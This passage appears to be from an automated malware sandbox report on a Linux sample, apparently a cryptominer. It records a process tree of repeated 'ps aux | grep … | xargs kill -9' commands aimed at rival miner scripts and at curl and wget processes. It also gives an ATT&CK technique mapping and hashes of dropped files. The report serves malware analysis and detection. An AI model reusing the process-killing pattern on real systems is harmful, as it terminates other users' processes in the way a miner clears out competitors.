  xargs -I "%" kill -9 "%"
  2⤵
  PID:1465
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1460
- /bin/grep
  grep curl
  2⤵
  PID:1469
- /bin/grep
  grep mr.sh
  2⤵
  PID:1468
- /bin/grep
  grep -v grep
  2⤵
  PID:1467
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1471
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1470
- /bin/ps
  ps aux
  2⤵
  PID:1466
- /bin/grep
  grep wget
  2⤵
  PID:1475
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1474
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1476
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1477
- /bin/grep
  grep -v grep
  2⤵
  PID:1473
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1472
- /bin/grep
  grep curl
  2⤵
  PID:1481
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1480
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1482
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1483
- /bin/grep
  grep -v grep
  2⤵
  PID:1479
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1478
- /bin/grep
  grep wget
  2⤵
  PID:1487
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1488
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1486
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1489
- /bin/grep
  grep -v grep
  2⤵
  PID:1485
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1484
- /bin/grep
  grep curl
  2⤵
  PID:1493
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1492
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1494
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1495
- /bin/grep
  grep -v grep
  2⤵
  PID:1491
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1490
- /bin/grep
  grep wget
  2⤵
  PID:1499
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1500
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1498
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1501
- /bin/grep
  grep -v grep
  2⤵
  PID:1497
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1496
- /bin/grep
  grep curl
  2⤵
  PID:1505
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1504
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1506
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1507
- /bin/grep
  grep -v grep
  2⤵
  PID:1503
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1502
- /bin/grep
  grep j2.conf
  2⤵
  PID:1510
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1511
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1512
- /bin/grep
  grep -v grep
  2⤵
  PID:1509
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1508
- /bin/grep
  grep wget
  2⤵
  PID:1516
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1517
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1515
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1518
- /bin/grep
  grep -v grep
  2⤵
  PID:1514
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1513
- /bin/grep
  grep curl
  2⤵
  PID:1522
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1523
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1521
- /bin/grep
  grep -v grep
  2⤵
  PID:1520
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1524
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1519
- /bin/grep
  grep wget
  2⤵
  PID:1528
- /bin/grep
  grep ficov
  2⤵
  PID:1527
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1529
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1530
- /bin/grep
  grep -v grep
  2⤵
  PID:1526
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1525
- /bin/grep
  grep curl
  2⤵
  PID:1534
- /bin/grep
  grep ficov
  2⤵
  PID:1533
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1535
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1536
- /bin/grep
  grep -v grep
  2⤵
  PID:1532
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1531
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1541
- /bin/grep
  grep wget
  2⤵
  PID:1540
- /bin/grep
  grep he.sh
  2⤵
  PID:1539
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1542
- /bin/grep
  grep -v grep
  2⤵
  PID:1538
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1537
- /bin/grep
  grep curl
  2⤵
  PID:1546
- /bin/grep
  grep he.sh
  2⤵
  PID:1545
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1547
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1548
- /bin/grep
  grep -v grep
  2⤵
  PID:1544
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1543
- /bin/grep
  grep wget
  2⤵
  PID:1552
- /bin/grep
  grep miner.sh
  2⤵
  PID:1551
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1553
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1554
- /bin/grep
  grep -v grep
  2⤵
  PID:1550
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1549
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1555
- /bin/grep
  grep -v grep
  2⤵
  PID:1556
- /bin/grep
  grep miner.sh
  2⤵
  PID:1557
- /bin/grep
  grep curl
  2⤵
  PID:1558
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1559
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1560
- /bin/grep
  grep nullcrew
  2⤵
  PID:1563
- /bin/grep
  grep wget
  2⤵
  PID:1564
- /bin/grep
  grep -v grep
  2⤵
  PID:1562
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1565
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1566
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1561
- /bin/grep
  grep nullcrew
  2⤵
  PID:1569
- /bin/grep
  grep curl
  2⤵
  PID:1570
- /bin/grep
  grep -v grep
  2⤵
  PID:1568
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1571
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1572
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1567

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit
/var/mail/user

Filesize
843B

MD5
6ddabffa64ead01378756c5bee674fe8

SHA1
163ad063c2ccc85acc195fc6caaf849106648d84

SHA256
9164371d6bafe479f485bbc1a95c83c5100a972f1012fca515cb9f7aec87a89f

SHA512
8f79673b66c94295c4e11484c168ed917c93e843446fa42d7d7f9fe46bd8e1a52c3b157abe5dab02550a43166a8dc5b1af4b252dcd94cd7a8954f3bd8769e07b

Download Submit
/var/mail/user

Filesize
1KB

MD5
a916d1a96b7d2be914c01d85a789ee35

SHA1
20f491a3b11c8933c30a793e800e0435eaad0b0e

SHA256
e623d4cf7734c66a711a02b0be62bcffd74bc9765a37e6be584eaff9d9c4d557

SHA512
5483fd319fe5c4933b4b5ff6e2c8d573fd8e7191d742bc859fc2a55dd4fb1e4ef5b7a927fee792e3fdb233e8d8401be7c4e39b858e328162f9c635a23ef746cd

Download Submit
/var/spool/exim4/input/1srSrD-0000Bj-3L-D

Filesize
146B

MD5
9f5c6e645a4e54e9efcbd7ef88955087

SHA1
f33d9d1d3ac898874c01d77f3edd880660ce3c44

SHA256
caa1ae0c6942b98e78a1cc5a09cf2ecdde92667add8da783bf4ca3dce6dc2387

SHA512
233e84e8990ae64b30606fc6a4af9b51e1470f7f189c4688a66c4210484397942683eb1a66d7e245e43b3760b57359dc749ec8858a29bf4ff44fc3fdd7f548fb

Download Submit
/var/spool/exim4/input/1srSrD-0000Bj-3L-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/1srSrI-0000Bg-TN-D

Filesize
128B

MD5
45b7969a680ca9f6de78a6a6f1cfd8a0

SHA1
867416ee894e99fe855fa10e347808f170414573

SHA256
496a087f8749407fc1e344596d1c99614d2e0f5fd37bf2981a7b1ecc7b090982

SHA512
ba96a9cdebf387e262068632134e3dead98d63826596d8f64aa53cdf9f3c5914f7703fb9017b4ad26d808fd5557db3af6e3c728e3d31e8c30c6632fee9db7a07

Download Submit
/var/spool/exim4/input/hdr.724

Filesize
915B

MD5
edaaedadfca92d686f04903e4d9d9564

SHA1
a312e3fc8f4cad31d9f9af1fd83770f3c56c15d7

SHA256
23d276deb4fea85b9ab6c17347a8ba8304c5944811b56c2b6b2b2700f25ab752

SHA512
850fc36c5d93a4c6200c40172ad0fcaa33c7c88156ee88962de94e36d11c57083ad82256f553cf95b9771a1958339a4953b6f2948ac6cda9c14274f19a3117f5

Download Submit
/var/spool/exim4/input/hdr.727

Filesize
915B

MD5
83a4e3b9e28833ee2b13eac6567f02c3

SHA1
93f59abc3bd04ba94f55fddfba5a259d5423412f

SHA256
c4f2531e92541ff100a7d1050080b09c02d9944868d2cf556b964367426dd34d

SHA512
be8a767f3c78113414851704a106a82ef741fd6211450d89b3e46ca9043969cdcea52de74aec3448d72bce82eeff9c35bbe0da2ce61fa19a75a668be5c585f52

Download Submit
/var/spool/exim4/msglog/1srSrD-0000Bj-3L

Filesize
288B

MD5
d181fd2a36fb627b07198f941f176f75

SHA1
4a39e313bcd6944902533011ada0acf2d89f77af

SHA256
b07dd6fe11eff9b5a2d294c350ffae7ab14c05ad3c487c3a644b977eebc08c0c

SHA512
4171d60145089438bfc24c1dcc8a0644459645c4227f6f20c2e2bbb388806db8d2f54a13641e23affbae7fa23c05e48e6e451f5f57dcbd039d8adedd74184be1

Download Submit
/var/spool/exim4/msglog/1srSrD-0000Bj-3L

Filesize
89B

MD5
ba104fe40eac06612bdbe8a88f0e8508

SHA1
6dd201be9a9edb1eb508d3562c84ba5c08a4b42c

SHA256
16aa9cd22a41b116baa89d231b0f4741d4aff4ca257e7f119bbd0443f6ccc1b4

SHA512
97a1ada7940713e654e67dc91af0e005bee2969a62162de11177653e9d56439ef6df2df9f667d81041ccd82c329f335d37e927002a494c2c4c6fa0ec39360e5b

Download Submit
/var/spool/exim4/msglog/1srSrI-0000Bg-TN

Filesize
89B

MD5
ef4f292ca8ccda3431c30fdcca09b733

SHA1
966fdf87acaae0ec2b5632b5174233aa0899573d

SHA256
91210f110f794b9c8bb8cea7b92838400fb56aa2480750264ac675771614206d

SHA512
e17b68522d48b291f5da9c412c39a8af27896957073b21b40dec1f032118aa47459c33d31d786591f4732663b3255b3372b0c98b538d58cb6ed16551a36261e5

Download Submit
/var/spool/exim4/msglog/1srSrI-0000Bg-TN

Filesize
288B

MD5
7bdcfb76f6ba84c32771eb3f7949306d

SHA1
9f41874f2f8cd08a93f24312236ea1d659bc3345

SHA256
2a83115497b6f52c518901051f5e8ea998cd284ef75428e39213ca95f1219a6e

SHA512
5ec3472ebb157a0edd55400885e4a1f71853111235bb80ed814793ec00a73e04811a3b7d2a3f5ac8c72fbf660faa9c381c96e88587848c82a7480efd1962e137

Download Submit
memory/898-1-0x771eb000-0x771fc050-memory.dmp

Download
memory/1553-2-0x771d9000-0x771ea060-memory.dmp

Download